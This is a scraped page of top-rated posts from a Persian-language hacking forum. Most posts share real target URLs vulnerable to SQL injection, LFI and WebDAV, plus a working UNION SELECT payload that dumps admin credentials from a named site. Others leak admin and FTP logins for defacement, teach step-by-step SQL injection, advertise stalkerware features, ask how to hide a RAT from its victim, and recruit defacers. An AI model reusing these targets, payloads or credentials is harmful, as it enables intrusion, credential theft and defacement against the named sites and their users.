ts icon
سرور تیم اسپیک گاردایران

پرچمداران

  1. DeMoN

    DeMoN

    مدیر ارشد


    • امتیاز

      66

    • تعداد ارسال ها

      2,564


  2. 1TED

    1TED

    کاربر فعال


    • امتیاز

      29

    • تعداد ارسال ها

      531


  3. Reza.Attacker

    Reza.Attacker

    مدير بازنشسته


    • امتیاز

      18

    • تعداد ارسال ها

      420


  4. *diamond*

    *diamond*

    کاربر انجمن


    • امتیاز

      16

    • تعداد ارسال ها

      113



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در شنبه, 11 مرداد 1399 در همه بخش ها

  1. 1 امتیاز
    1TED

    تارگت های Sql Injection

    تاپیک خوابه !؟‌‌ 😕 www.crautonoma.gov.co/solicitudrgestoresacu.php?id=20 gov
  2. 1 امتیاز
    http://www.sssrwp.pl/aktualnosci.php?typ=999999.9' http://www.rema.nieruchomosci.pl/print.php?rid=2372' http://www.magnoliahouse.pl/obiekty.php?typ=999999.9' https://mbooking.pl/firma.php?f_id=' http://www.tyimy.pl/oferta.php?typ=4&id_typ=999999.9' https://www.mam-sklad.pl/komentarz-dodaj.php?t_id=0&a_id=982' https://kartaturysty.pl/firma.php?f_id=296'
  3. 1 امتیاز
    http://peiagsc.ca/employment_details.php?id=1031 http://peiagsc.ca/admin/login.php
  4. 1 امتیاز
    DeMoN

    SQL Injection(PART1)

    سلام. برای تاپن های sqli تاپیک جامع وجود داره نیاز نیست تاپیک جدا بزنید. تارگت هارو منتقل کنید تا تاپیک ها پاک بشن. تارگت Sqli موفق باشید
  5. 1 امتیاز
    من یک توضیحی کوچکی در رابطه با موارد بالایی بدم: استفاده از روش post: منظور این است که اهداف حمله براساس متود Post یا تحت سورس قابل نمایش است یا بهتر بگویم هنگامی شما دستور شرطی مثلا where در url سایت وارد میکنید نتایج ان را میتوانید باکلیک برروی view Source مشاهده کنید که یک مقادیری برای شما بنمایش در اورده است... به همین راحتی استفاده از متود xpatch یا روش اهراز هویت موقت: شما توسط یک اهراز هویت موقت میتوانید کامندهای sql خودرا تزریق کنید و این ممکن است در یک فیلد یا در هرجایی که value دریافت کند قابل انجام است مثلا ما توسط شرط or 1=1 به یک وب اپلیشین میفهمانیم که مقادیر true یا به عبارتی قابل خوانش توسط پردازش گر های مرکزی هستند که این ملزم به صحیح بودن دسترسی دارد که این دسترسی را برای ما بصورت Active برمیگرداند که مانند این است که یک فایروال ما را تایید میکند و یک submit را به ما بر میگرداندو... که میتوان در باره این متود حداقل 20 صفحه نوشت یا شاید بسیار زیادتر... استفاده از متود null : در این روش ما برای وارد کردن دستورات sql خود که یک دستورات اصلی sqli فرض میشوند استفاده میکنیم که این روش از اررور هایی مانند forbidden error یا تمام اررور که مارا از سطح دسترسی محدود میسازند کارایی داردو اموزش های زیادی برای این روش هم بصورت تصویری و هم تئوری ارائه شده اند که بالفرضشما مقادیر integer یا صحیح را بصورت رشته ای یا "1" درج میکنید ... و .... که خودتان بهتر میدانید و شاید توضیح دادم
  6. 1 امتیاز
    با عرض پوزش میخواستم یک ایرادی از کسانی که به تیبل های اسیب پذیر اشاره کرده اند بگیرم تیبل های اسیب پذیر بکلی اشتباه است یعنی هنگامیکه ما یک پایگاه مثلا اوراکل نصب و ران کردیم و یک دیتابیس تنظیم کردیم و فیلد هایی را از ورودی به اون دادیم که اعداد یا حروف گرفته میشوند و در خروجی در سطح وب اپلیشکن برای ما خروجی میگیرند که این مقادیر که در یک تیبل یا اصلا کالومن که قسمت کوچکتری از تیبل را شامل میشود ذخیره میشود که اصلا ما نمیتوانیم بگوییم که این اسیب پذیری از یک تیبل است یعنی اگر بگوییم اسیب پذیری در یک تیبل یا جداول درج اطلاعات اتفاق افتاده است پس مفهوم رنگ دیگری میگیرد یعنی ان پایگاه داده بکلی اشتباه برنامه نویسی شده که منجر به بروز این باگ شده است . من یک طرح کلی بیان کنم دستورات sqlinjection اولا توسط یک ورودی فیلد یا هرجایی که میتوان اعداد یا حروف هایی را درج کرد وارد یک پروسه میشود این پروسه بصورت زیر بیان میشود: url-> web_appllication -> web_server or web center processor-> my sqli_Centeral Data Saved پس روند کلی دستورات sqlinjectin به این صورت بود ودر واقع هنگامی یک باگ sql در سایت پدید میاید اطلاعات دیتابیس را در پشت مخازن webapllication سیو میکند که ما توسط دستورات اسیکوال سرور ان اطلاعات را فراخوانی میکنیم و اهراز هویت خود را مطابق با Admin_User تعریف میکنیم که منجر به رخنه میشود فقط همین وبس
  7. 1 امتیاز
    در اینجا یه تارگت با یوزر پسورد FTP آماده دیفیس رو میزارم باید بگم که میتونین با استفاده از سایت هایی مثل https://www.onlineftp.ch/ به FTP کانکت شین و از هاست استفاده کنید باگ :
  8. 1 امتیاز
    ممنون مهندس با اجازه شما بنده این دو بخش فعلا شروع کردم امید به حق تعالی امیدوارم مورد پسند دوستان واقع بشه یا حق pfsense metasploit
  9. 1 امتیاز
    SMS/MMSDisplay the log of sent and received SMS/MMS. CallsAudio recording and pieces of information related to incoming and outgoing calls. Block callsBlock incoming calls from one or several contact(s). LocationsDisplay the log of GPS and/or live location. PicturesDisplay photos taken by the phone. ApplicationsList the applications installed on the smartphone. Block ApplicationsCan block one or more application (s). CalendarList the information in the calendar. ContactsList the contacts stored on the phone. Blocking SiteBlock one or more websites. Facebook *List sent and received Facebook messages. WhatsApp *List sent and received WhatsApp messages. Hangouts *List sent and received Hangouts messages. Skype *List sent and received Skype messages. LINE *List sent and received LINE messages. Kik *List sent and received Kik messages. Viber *List sent and received Viber messages. Gmail *List sent and received Gmail messages. Vibrate - RingMake vibrate or ring the phone. Send a messageSends a notification (voice or text). Send SMSSend an SMS from the web interface. LocationProvide location coordinates. GPS-WIFIEnable/disable GPS and/or WiFi. Lock / UnlockLock/unlock with a 4-digit code. General InformationRetrieves the status of the phone (battery, IMEI ...). ResetFormats the phone. Recover DataGet the data list of SMS, Calls, History, Bookmarks and Chrome browsing history*. IM (messages) *Retrieve the list of messages from Facebook, WhatsApp, Hangouts, LINE, Kik, Viber, Skype, Gmail. Instant messaging (Calls) *Retrieve the list of Skype and Viber calls. Retrieve the list of contactsRetrieve the list of phone contacts. Hide/Show iconHide/show the application on the application list. Take a pictureTaking a picture with the camera front or back, with or without flash. History recoverRecover the history of the default web browser. Audio recordingRecord audio in MP3 format. Restart the phone *Restarted the phone. SMS commandsControl your smartphone with SMS commands. Save your dataBacking up your data to PDF, Excel, CSV ... And much more ...Search by name, message,
  10. 1 امتیاز
    Mr_007

    تارگت های LFI

    lfi http://www.hussainimmigration.com/index.php?page=../../../../../../../../../../../etc/passwd
  11. 1 امتیاز
    http://www.hack-mirror.com/489411.html
  12. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=17561 http://aljyyosh.org/mirror.php?id=175613 http://aljyyosh.org/mirror.php?id=175610 http://aljyyosh.org/mirror.php?id=175609 http://aljyyosh.org/mirror.php?id=175606 http://aljyyosh.org/mirror.php?id=175605 http://aljyyosh.org/mirror.php?id=175604 http://aljyyosh.org/mirror.php?id=175603 http://aljyyosh.org/mirror.php?id=175602 http://aljyyosh.org/mirror.php?id=175600 http://aljyyosh.org/mirror.php?id=175599 http://aljyyosh.org/mirror.php?id=175598 http://aljyyosh.org/mirror.php?id=175597 Mass
  13. 1 امتیاز
    تارگت : http://www.spcc.com.sa/content.php?id=-68
  14. 1 امتیاز
    تارگت: دی http://www.nbrri.gov.ng/sites/news.php?ID=2
  15. 1 امتیاز
    تارگت: http://www.viadelvento.it/iniziativa.php?id=7
  16. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=174280
  17. 1 امتیاز
    درود کاخ سفید !!!! https://www.seniorshousing.org/about-recent-news.php?ID=-43'union+select+1,2,3,4,group_concat(0x3c62723e ,Username,0x3a,Password),6,7,concat(0x4775617264204972616e205365637572697479205465616d),9,10,11,12,13+from+CMS_Login--+ اینم ادمین پیجش https://www.seniorshousing.org/admin/index.php دیکد کردن پسورد با خودتون :دی
  18. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=170451
  19. 1 امتیاز
    این رو از قدیم ها دارم هر کدوم گرفت دیگه 11768 تارگت است lfi sql rfi ... تشکر فراموش نشه 1398.1.9.txt
  20. 1 امتیاز
    دوستان واقعا این سایت ها تست شده اس و زحمت کشیده شده واسش تشکر فراموش نشه http://gospelmission.ca/index.php?page=1 user : admin pass : godork65 user : jeff pass : gospel7 ادمین پیج با خودتون
  21. 1 امتیاز
    سلام مدیر عزیز من تو بخش هک و کرک اکانت میتونم کمک کنم اگر نیاز داشتین بگین تا استارت کارو بزنم هنو استارت نزدم ولی شما بگین یه تیکاف میزنم بجای استارت
  22. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=168045
  23. 1 امتیاز
    درود. دوستان عزیز فعالیت خودتون رو آغاز کنید. فعالیت شما مورد نظارت مدیریت قرار میگیره و بعد از تایید صلاحیت رنکینگ اهدا میشه. دقت کنید که فقط اعلام آمادگی ملاک نیست و باید فعالیت مفید و مستمر داشته باشید. موفق باشید
  24. 1 امتیاز
    یه وبلاگی هستش که از یک ابزار که توسط 1abzar.com برای نظرسنجی هستش استفاده کرده که به هر سیستم فقط یکبار اجازه ثبت نظر میده - آیا روشی هستش که این ثبت رو دور زد و بیشتر ثبت کرد؟
  25. 1 امتیاز
    dci

    امنیت 99%مودم

    سلام اموزش تصویری امنیت کامل مودم در خدمت شما هستم امید وارم مفید باشه. http://s6.picofile.com/file/8256751300/MOSTAFA_F.exe.html
  26. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=166597
  27. 1 امتیاز
    aircrack فقط مخصوص کالی نیست و نسخه ویندوز هم داره...
  28. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=165257
  29. 1 امتیاز
    pppp

    رات

    با سلام میخواستم یک سوال بپرسم ایا میشه وقتی کارمون با قربانی تمام شود راتی که تو گوشی یا کامپیوترش ریختیم پاک کنیم و هیچ اصری از ما نماند
  30. 1 امتیاز
    ZARBAT

    هک سایت

    هک سایت
  31. 1 امتیاز
    http://aljyyosh.org/mirror.php?id=161025
  32. 1 امتیاز
    best11

    پیام خصوصی

    موافقم این تازه کارها اصلا روی مخ ما هستن
  33. 1 امتیاز
    http://zone-hc.com/archive/mirror/0a67fe7_carp-fever.co.uk_mirror_.html http://zone-hc.com/archive/mirror/dd7076c_westtexasatv.com_mirror_.html http://zone-hc.com/archive/mirror/736415d_dikagallery.be_mirror_.html
  34. 1 امتیاز
    با سلام یونس صبری هستم برنامه نویس و طراح و در زمینه هک بسیار تجربه دارم و تمام اون لیستی رو که دادید برای آمادگی همش آب خوردنه به امید پیشرفت گارد ایران من رسما برای همه موضوعات اعلام آمادگی میکنند..
  35. 1 امتیاز
    سلام من آمادگی خودمودر بخش گرافیک اعلام می کنم و تا جایی که بتونم در زمینه گرافیک در نرم افزار photoshopکمک خواهم کرد
  36. 1 امتیاز
    DeMoN

    تارگت باگ webdav

    yhylc519.cn/index.html yhdc397.cn/index.html yglylc191.cn/index.html yfgjylc377.cn/index.html ydylc719.cn/index.html yfgj131.cn/index.html xtylc591.cn/index.html yddc737.cn/index.html ydgjylc715.cn/index.html xzw717.cn/index.html ybgf593.cn/index.html yb151.cn/index.html xsjylc737.cn/index.html xxlylc557.cn/index.html xxgjylc975.cn/index.html xymylc535.cn/index.html xyzqbf915.cn/index.html xygjylc068.cn/index.html xyxylc179.cn/index.html xqbylc131.cn/index.html xyf048.cn/index.html xpjylc399.cn/index.html xtycylc937.cn/index.html xsdyl317.cn/index.html
  37. 1 امتیاز
    DeMoN

    تارگت باگ webdav

    zqkh513.cn/index.html zqpl268.cn/index.html zqbf315.cn/index.html zqd111.cn/index.html zqzb597.cn/index.html zqpk119.cn/index.html zqlhj915.cn/index.html zryx353.cn/index.html zjh397.cn/index.html zqbfw953.cn/index.html zqssc515.cn/index.html zqtzkh757.cn/index.html zqtzw026.cn/index.html zqwkh353.cn/index.html ztylckh191.cn/index.html zqtzpt557.cn/index.html bbylc915.cn/index.html ayylc999.cn/index.html azgjylc555.cn/index.html zyylc511.cn/index.html bcgspm139.cn/index.html bc117.cn/index.html bcdh317.cn/index.html
  38. 1 امتیاز
    mhmdn

    تغییر مک ادرس

    سلام ب این برنامه میتونین مک ادرس خودتونو تغییر بدین لینک اسکن: https://virusscan.jotti.org/en-US/filescanjob/dfpt8rldnx فایل اسپای ویر بود حذف شد
  39. 1 امتیاز
    طبق شرایط جذب دیفیسر ها, لینک اثباک دیفیس های خودتون رو در انجمن قرار بدید بعد از اینکه توانایی شما در این زمینه اثبات شد با افتخار شمارو عضو تیم دیفیس اعلام میکنیم
  40. 1 امتیاز
    barry

    تارگت های تمرینی

    با سلام براتون کلی تراگت اوردم فایل پیوستی رو دان کنید عشق کنید رمز نداره ها پخش نکنید !! تارگت های sql injection هستند . hack tragets.rar
  41. 1 امتیاز
    An0int3d

    هک جیمیل

    سلام از فیک پیج و ... میتونی استفاده کنی. همه چی تو این دنیا فانیه و قابل دورزدن و هکه به جز مرگ!!! موفق باشی وست عزیز....
  42. 1 امتیاز
    درود. به این خاطره که پسوند فایل غیره مجزه. به همین خاطره که میگن ابتدا به صورت زیپ آپ کگنید سپس در خود هاست اکسترکت کنید. یا حق
  43. 1 امتیاز
    DeMoN

    تارگت باگ webdav

    http://bbs.tiaofun.com/
  44. 1 امتیاز
    DeMoN

    تارگت باگ webdav

    http://0515sydn.com/index.txt
  45. 1 امتیاز
    DeMoN

    تارگت باگ webdav

    http://www.qdshibei.gov.cn/
  46. 1 امتیاز
    با اجازه از مدیر گرامی P0!s0nC0d3 بنده هم چند مرحله از این آموزش رو قرار می دم. در این جلسه شما با سه مرحله از 6 مرحله آشنا می شید و در پست های اینده ادام ی مراحل رو قرار می دم توجه کنید که این آموزش پایین ترین سطح هست وسعی شده که برای افراد تازه کار مناسب باشه.در آموزش های بعدی به طور کامل و مفصل در مورد سطح حرفه ای تر صحبت می کنیم. اولین قدم:تست نفوذ پذیری سایت نکته ما از تارگت فرضی زیر استفاده می کنیم. http://www.site.com/news.php?id=6 برای تست نفوذ پذیری چند راه هست. 1-تست با استفاده از اسکنر هایی مانند اکانتیکس و وگا 2-اضافه کردن کوتیشن: در روش دوم تارگت به این صورت نشون داده میشه http://www.site.com/news.php?id=6’ نکته:شما می تونید به جای کوتیشن از 27% هم استفاده کنید. به این صورت: http://www.site.com/news.php?id=6%27 خب بعد از گذاشتن کوتیشن یکی از دو اتفاق زیر میفته 1-صفحه بعد از بالا اومدن هیچ تغییری نمی کنه.(سایت آسیب پذیری sql ندارد) 2-صفحه ارور می ده و یا ناقص لود میشه(سایت آسیب پذیره) مرحله ی دوم:پیدا کردن ستون ها وستون های آسیب پذیر. برای این کار از دستور order by استفاده می کنیم.(order by از نظر لغوی به معنای دستور دادن به وسیله ی ...است) توجه کنید که باید در قسمت آخر ستون رو حدس بزنید.در عبارت زیر ستون حدسی رو 10 قرار دادم. مثال: --http://www.site.com/news.php?id=6+order+by+10 نکته:به جای + از space هم می تونید استفاده کنید.اما برای این که گیج نشید بهتره از + استفاده کنید. مثال: http://www.site.com/news.php?id=6 order by 10— خب الان دو حالت به وجود میاد: 1- سایت بدون ارور نمایش داده میشه. 2- سایت ارور sql می ده. و ما باید تعداد ستون هارو کم تر کنیم. حالا فرض می کنیم سایت ما 5 تا ستون داره.(البته ما نمی دونیم.) پس به ای صورت میشه: --http://www.site.com/news.php?id=6+order+by+10 ارور داد --http://www.site.com/news.php?id=6+order+by+9 ارور می ده --http://www.site.com/news.php?id=6+order+by+8 ارور می ده --http://www.site.com/news.php?id=6+order+by+7 ارور می ده --http://www.site.com/news.php?id=6+order+by+6 بدون ارور --http://www.site.com/news.php?id=6+order+by+5 بدون ارور و همین طور ادامه پیدا می کنه تا عدد 1.پس ما فهمیدیم تارگتمون(هدف) 5 تا ستون داره. حالا باید با استفاده از دستور union select تیبل آسیب پذیر رو پیدا کنیم. مثال: --http://www.site.com/news.php?id=6+union+select+1,2,3,4,5 خب با استفاده از این دستور ستون آسیب پذیر رو پیدا کردیم.بر فرض 3. نکته:گاهی اوقات ممکنه یه سایت چند تا ستون آسیب پذیر داشته باشه. مرحله ی سوم: پیدا کردن ورژن دیتابیس. این مرحله بسیار مهمه چون طریقه ی هک کردن بعد از این مرحله به ورژن تارگت مربوطه.در این مقاله آموزش ورژن های بالای 5 رو یاد می گیرید. برای پیدا کردن ورژن دیتابیس کافیه که به جای ستون آسیب پدیر version() رو قرار بدید. مثال: --http://www.site.com/news.php?id=6+union+select+1,2,3,4,5 ستون 3 آسیب پدیر بود حالا به جاش version() رو قرار می دیم به این صورت: --http://www.site.com/news.php?id=6+union+select+1,2,version(),4,5 تارگت بعد از لود شدن ورژن رو به شما نشون می ده.بر فرض 5.1.2
  47. 1 امتیاز
    حالا خیلی ساده فرآیند بوت شدن را توضيح ميدهيم : 1- Grub اجرا می شود. 2- Grub فایل سیستم قسمت بوت را می شناسد. 3- grub تصویر کرنل را روی حافظه بارگذاری می کند. 4- grub یک Ram Disk بروی Ram ایجاد می کند. این کار بر اساس initRD image انجام می شود. initRD image تصویری از ماژولهای اصلی مورد نیاز برای ابتدای بوت شدن و یک ساختار دایرکتوری مختصر است. 5- در این مرحله ما یک لینوکس بسیار ساده در Ram بصورت فقط خواندنی داریم. از این پس شناخت درایورها آغاز می شود. 6- در این مرحله فایل سیستم اصلی یعنی root سیستم شناخته و به سیستم اضافه می شود. 7- حالا فرآیند بوت اصلی لینوکس با آغاز با کار فرآیند init آغاز می شود. 8- سرانجام init با بررسی و اتصال فایل سیستم و remount ساختار اصلی بصورت قابل خواندن و نوشتن سیستم را آماده استفاده می کند. چند نکته در مورد پروسه init : :: معمولا init بصورت یک daemon (نرم افزاری که در پس زمینه اجرا می شود) اجرا می شود و شماره پروسه(PID) آن یک می باشد. :: کلیه تنظیمات پروسه init در فایل inittab در شاخه etc قرار دارد. :: پروسه init سایر پروسه ها را اجرا و کنترل می کند.
  48. 1 امتیاز
    *diamond*

    سيستم عامل slackware

    معرفی‌نامه‌: اسلكورقدیمی‌ترین سیستم عامل زندهٔ لینوکسی است که توسط پاتریک والکردینگ در سال ۱۹۹۳ از لینوکس SLS مشتق شد‌. این سیستم‌ عامل شبيه یونیکس علاقه‌مندان بسیاری را طی این سال‌ها به سوی خود جذب کرده که روز به روز بر کیفیت آن می‌افزایند‌. اسلکور 18 ساله هم‌اکنون در رتبهٔ 12‌ام از جدول رنکینگ ديستروواچ قرار دارد و به جر‌ات می‌توان گفت که تا مدت‌ها در همین محدوده و شاید بالا‌تر شاهد حضورش خواهیم بود‌. چرا اسلکور‌؟ جواب این سوال بسیار ساده است‌! اسلکور همان‌چیزی است که از یک گنو/لینوکس انتظار دارید‌! اسلکور را می‌توانید همانطور که می‌خواهید نصب کنید‌! چه به Arch سادگي و پاكي و چه با مجموعه‌ای از ابزار‌های مورد نیاز برای کار با یک توزیع لینوکسی‌: انتخاب با شماست‌. نکتهٔ جالب دیگری که پس از مدتی کار با اسلکور به آن پی می‌برید‌، پایداری واقعا بالای آن است‌! تا حدی که ممکن است بعضی وقت‌ها آرزو کنید که‌ای کاش بلد بودید چگونه خرابش کنید‌!
  49. 1 امتیاز
    ادامه پارت ها . . . EVENTS.part4.rar EVENTS.part5.rar EVENTS.part6.rar
  50. 1 امتیاز
    سلام خدمت تمامي دوستان با ادامه ي آموزش هاي برنامه نويسي با زبان #C در خدمت شما هستم در اين قسمت آموزش نحوه ي ساخت فرم ها رو براتون قرار دادم به دليل حجم زياد فيلم در دو پست قرار ميدم و براي اكسترك فايل بايد همه ي پارت ها در دو پست رو دانلود كنيد پسورد : guardiran.org 05-form.part01.rar 05-form.part02.rar 05-form.part03.rar 05-form.part04.rar 05-form.part05.rar ادامه پارت ها در پست بعدي دانلود كنيد